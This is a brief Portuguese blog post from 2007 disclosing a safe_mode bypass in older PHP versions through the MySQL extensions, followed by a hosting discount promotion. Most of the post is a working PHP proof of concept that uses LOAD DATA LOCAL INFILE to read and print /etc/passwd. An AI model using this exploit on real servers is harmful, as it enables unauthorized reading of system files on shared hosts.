pra não esquecer…

September 18th, 2007

vulnerabilidade PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi, até em safe_mode

Posted by Felipe Olivaes in Apache, MySQL, PHP

resumido rapidinho que estou com pressa...

a vulnerabilidade afeta PHP's com extensão MySQL e MySQLi....

o erro está utilizando a lib do mysql (que não é monitorada pelo safe_mode), consegue ler um arquivo do servidor...
exemplo:

PLAIN TEXT
PHP:
  1. <?php
  2.  
  3. file_get_contents('/etc/passwd');
  4.  
  5. $l = mysql_connect("localhost", "root");
  6. mysql_query("CREATE DATABASE a");
  7. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  8. mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
  9. mysql_close($l); mysql_connect("localhost", "aaaa");
  10.  
  11. mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
  12.  
  13. $result = mysql_query("SELECT a FROM a.a");
  14. while(list($row) = mysql_fetch_row($result))
  15.     print $row . chr(10);
  16.  
  17. ?>

várias empresas de host estão vulneráveis, mas como eu sempre digo, a melhor hospedagem do brasil é a kinghost, o pessoal já corrigiu essa falha de segurança....

hospede seu site na kinghost e ganhe um desconto:
Ganhe 15% de desconto nas 3 primeiras mensalidades na melhor empresa de hospedagem do brasil com toda certeza…

Acesse o link abaixo
http://www.kinghost.com.br/promo/BIGDESCONTO.html
ou digite o código promocional BIGDESCONTO no cadastro

Leave a reply


 



nuvem de tags:

24 horas acentuação Apache bash benchmark bios boot celular centos charset comando console Download esxi Firebird firefox http importação intel ipod iscsi kinghost legenda Linux lost mod_deflate msn mssql MySQL owner Padel PHP placa mãe portabilidade Postgre SQL recovery root password shell sinuca sql server svn temporada completa veronica mars vmware Windows ícones